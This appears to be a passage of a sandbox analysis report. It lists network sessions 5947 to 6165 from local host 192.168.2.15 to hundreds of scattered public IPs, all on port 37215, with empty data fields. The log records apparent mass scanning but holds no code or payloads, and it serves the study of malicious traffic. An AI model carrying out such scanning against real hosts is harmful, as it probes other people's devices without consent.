                                              5947192.168.2.1534848186.17.129.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5948192.168.2.155747245.133.110.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5949192.168.2.1555746222.190.148.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5950192.168.2.1542894138.42.102.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5951192.168.2.1537986136.80.229.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5952192.168.2.1541986157.104.214.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5953192.168.2.1553046109.207.80.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5954192.168.2.155437245.151.245.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5955192.168.2.1540588190.249.130.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5956192.168.2.1547384156.23.186.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5957192.168.2.153473831.53.158.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5958192.168.2.1557718181.123.36.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5959192.168.2.1550164181.241.153.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5960192.168.2.1558038197.220.172.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5961192.168.2.1547828157.230.46.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5962192.168.2.1550902156.219.60.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5963192.168.2.1534022102.187.5.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5964192.168.2.154746631.86.253.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5965192.168.2.1560262128.91.245.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5966192.168.2.1536032186.135.161.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5967192.168.2.1543908138.70.218.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5968192.168.2.155061231.207.183.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5969192.168.2.154366841.161.149.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5970192.168.2.155619044.205.12.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5971192.168.2.154277837.204.227.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5972192.168.2.1560778156.211.139.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5973192.168.2.154782641.9.63.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5974192.168.2.153569445.74.62.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5975192.168.2.1550284156.147.209.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5976192.168.2.154594231.123.112.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5977192.168.2.1549324222.108.206.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5978192.168.2.1553082121.162.47.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5979192.168.2.153525694.182.125.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5980192.168.2.1552296222.10.166.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5981192.168.2.1553454156.93.186.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5982192.168.2.1549630156.155.196.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5983192.168.2.1550004157.93.20.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5984192.168.2.1541376138.53.17.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5985192.168.2.1535818135.47.57.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5986192.168.2.1553644217.207.146.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5987192.168.2.1537022222.224.227.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5988192.168.2.1545434122.151.145.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5989192.168.2.154092094.106.58.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5990192.168.2.1553002156.188.245.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5991192.168.2.154351041.219.225.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5992192.168.2.1550876121.112.50.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5993192.168.2.1559132157.209.124.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5994192.168.2.155077641.79.189.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5995192.168.2.1533466156.208.159.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5996192.168.2.1543540156.226.179.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5997192.168.2.154726245.119.102.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5998192.168.2.156000831.0.213.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5999192.168.2.155401494.55.57.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6000192.168.2.154044641.100.146.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6001192.168.2.1550644121.56.147.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6002192.168.2.1553426122.102.39.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6003192.168.2.154943645.54.172.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6004192.168.2.1539938156.115.48.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6005192.168.2.153597641.194.177.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6006192.168.2.1533290190.216.43.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6007192.168.2.1554690190.130.4.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6008192.168.2.154736694.45.144.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6009192.168.2.1539640190.89.210.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6010192.168.2.1552190122.215.74.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6011192.168.2.1544702181.97.98.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6012192.168.2.1548020190.141.230.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6013192.168.2.1553930156.47.182.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6014192.168.2.155970037.232.59.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6015192.168.2.1544422122.42.181.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6016192.168.2.1538916122.22.93.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6017192.168.2.155318441.68.201.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6018192.168.2.1558152102.30.228.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6019192.168.2.154211637.63.35.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6020192.168.2.154467037.188.122.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6021192.168.2.1545642102.230.81.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6022192.168.2.154649645.100.79.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6023192.168.2.1540856168.126.13.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6024192.168.2.1547206138.80.158.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6025192.168.2.1538308121.227.133.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6026192.168.2.154006045.167.138.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6027192.168.2.1548094193.84.159.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6028192.168.2.1535508197.184.92.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6029192.168.2.1559768190.24.95.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6030192.168.2.1546154157.127.0.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6031192.168.2.1560156181.159.254.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6032192.168.2.154356470.111.26.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6033192.168.2.1552762121.218.133.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6034192.168.2.154089631.108.208.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6035192.168.2.1535302156.198.66.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6036192.168.2.1547954190.192.166.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6037192.168.2.1539010122.129.2.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6038192.168.2.1540792190.109.38.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6039192.168.2.1537428181.73.93.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6040192.168.2.154278477.233.82.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6041192.168.2.154786237.67.34.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6042192.168.2.1550326121.238.51.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6043192.168.2.153348245.100.157.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6044192.168.2.155557031.95.225.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6045192.168.2.154369031.28.200.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6046192.168.2.1534270138.162.188.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6047192.168.2.1554542197.44.84.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6048192.168.2.1556328121.117.113.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6049192.168.2.154351831.118.54.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6050192.168.2.1538086156.101.249.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6051192.168.2.154883645.165.218.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6052192.168.2.1535330181.93.26.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6053192.168.2.1555818190.170.156.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6054192.168.2.153656831.191.12.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6055192.168.2.155728494.44.252.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6056192.168.2.154268241.158.244.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6057192.168.2.1536966154.12.13.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6058192.168.2.1540304138.157.55.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6059192.168.2.153605237.57.84.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6060192.168.2.1537730102.65.236.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6061192.168.2.1553072156.240.173.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6062192.168.2.1559698122.219.68.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6063192.168.2.155721441.230.70.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6064192.168.2.1551338221.96.145.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6065192.168.2.1533468178.145.155.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6066192.168.2.1551698222.57.170.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6067192.168.2.1554500181.244.78.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6068192.168.2.154876241.57.0.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6069192.168.2.1536630157.137.126.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6070192.168.2.1553418197.92.52.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6071192.168.2.1558376157.38.41.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6072192.168.2.1547274138.211.140.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6073192.168.2.1558556156.16.146.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6074192.168.2.155893094.131.201.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6075192.168.2.1545796138.155.65.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6076192.168.2.155557245.117.25.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6077192.168.2.154903837.192.126.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6078192.168.2.1557980121.212.143.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6079192.168.2.1534278102.46.170.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6080192.168.2.154523645.63.30.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6081192.168.2.1544406138.175.215.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6082192.168.2.1559708186.204.193.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6083192.168.2.155732691.92.107.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6084192.168.2.155305641.155.1.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6085192.168.2.1540120181.135.205.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6086192.168.2.1558112156.2.184.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6087192.168.2.154586631.88.180.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6088192.168.2.1554570222.197.188.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6089192.168.2.1541136222.69.70.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6090192.168.2.1547956121.202.132.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6091192.168.2.155211637.78.188.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6092192.168.2.1548448181.215.46.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6093192.168.2.1536510190.150.107.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6094192.168.2.153874094.66.166.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6095192.168.2.1541198122.20.186.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6096192.168.2.155768045.126.5.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6097192.168.2.154717437.31.33.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6098192.168.2.1553296197.111.118.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6099192.168.2.1549348186.136.66.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6100192.168.2.1540754157.33.92.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6101192.168.2.1536262197.213.132.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6102192.168.2.1560162157.9.80.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6103192.168.2.154809641.9.115.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6104192.168.2.154660894.180.14.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6105192.168.2.1539774156.44.39.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6106192.168.2.154107245.158.37.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6107192.168.2.154722441.64.78.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6108192.168.2.1547362122.46.161.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6109192.168.2.155644045.27.207.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6110192.168.2.1548244181.94.47.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6111192.168.2.154344637.62.171.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6112192.168.2.1544912138.111.185.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6113192.168.2.1536808181.138.119.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6114192.168.2.1559550102.233.166.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6115192.168.2.1549720157.137.37.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6116192.168.2.1559814197.75.62.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6117192.168.2.155901437.148.230.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6118192.168.2.154525445.100.152.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6119192.168.2.155387641.67.241.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6120192.168.2.1537552222.72.250.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6121192.168.2.154603231.72.191.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6122192.168.2.154799231.95.205.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6123192.168.2.1551916197.200.1.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6124192.168.2.1543188102.213.234.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6125192.168.2.154838094.247.88.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6126192.168.2.1543890121.197.66.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6127192.168.2.155281445.75.175.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6128192.168.2.1546926181.210.32.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6129192.168.2.1539766190.6.153.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6130192.168.2.1539348222.230.224.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6131192.168.2.1558950156.80.65.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6132192.168.2.1535720122.63.50.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6133192.168.2.1536374122.201.116.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6134192.168.2.1545388102.204.140.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6135192.168.2.1553358186.134.7.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6136192.168.2.153355037.56.124.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6137192.168.2.1550558222.13.163.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6138192.168.2.155259894.70.29.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6139192.168.2.1552118102.141.210.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6140192.168.2.1536184197.120.155.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6141192.168.2.154544031.71.192.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6142192.168.2.1536366181.117.46.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6143192.168.2.1543704222.118.107.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6144192.168.2.153328294.41.92.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6145192.168.2.1555844157.57.251.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6146192.168.2.155241445.109.181.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6147192.168.2.1557332157.54.68.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6148192.168.2.1559628190.241.67.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6149192.168.2.1548424156.97.248.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6150192.168.2.155839437.28.161.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6151192.168.2.1560368190.87.60.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6152192.168.2.154521245.31.227.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6153192.168.2.154519831.37.105.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6154192.168.2.154746637.146.156.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6155192.168.2.1555444190.107.110.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6156192.168.2.153699237.173.30.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6157192.168.2.1556314197.234.194.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6158192.168.2.1553540180.14.35.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6159192.168.2.1539024181.71.71.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6160192.168.2.154581494.217.191.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6161192.168.2.153940645.75.169.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6162192.168.2.153452694.165.96.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6163192.168.2.1560124102.1.42.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6164192.168.2.1533402141.4.4.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6165192.168.2.1556910138.209.108.14237215
                                              TimestampBytes transferredDirectionData


